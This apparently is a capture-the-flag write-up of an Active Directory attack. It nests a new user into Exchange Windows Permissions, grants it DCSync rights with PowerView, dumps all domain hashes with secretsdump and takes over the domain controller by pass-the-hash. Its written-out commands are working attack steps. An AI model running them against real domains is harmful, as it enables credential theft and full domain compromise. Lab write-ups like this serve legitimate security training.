Account Operators
Notice that the current user is a member of a group that is itself nested inside Account Operators. Account Operators can create accounts and change the membership of any group that is not protected by AdminSDHolder, so we can add a new user to the domain.
net user lyethar password /add /domain
We then add the new user to a group the current user is also a member of: "Exchange Windows Permissions". This group matters because, on a default Exchange installation, it holds WriteDacl on the domain object, which is what lets us grant replication rights in the next step. Note the argument order: the account name comes before /add, and /domain is needed so the change goes to the DC rather than the local SAM.
net group "Exchange Windows Permissions" lyethar /add /domain
We upload PowerView.ps1, dot-source it, and run the following commands. The -Credential parameter is required: our current logon token was built before the group change, so the new group's WriteDacl only takes effect in a fresh logon as the user we just created.
$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAINNAME\lyethar', $pass)
# DCSync = DS-Replication-Get-Changes, -All and -In-Filtered-Set on the domain object
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity lyethar -Rights DCSync
Then, with the user we created, we run Impacket's secretsdump.py against the DC. Because the account now holds the replication rights, secretsdump uses DCSync (DRSUAPI replication) to pull every account's NT hash, including the Administrator's. Finally we use psexec.py with the Administrator hash (pass-the-hash) to get a shell on the DC as Administrator.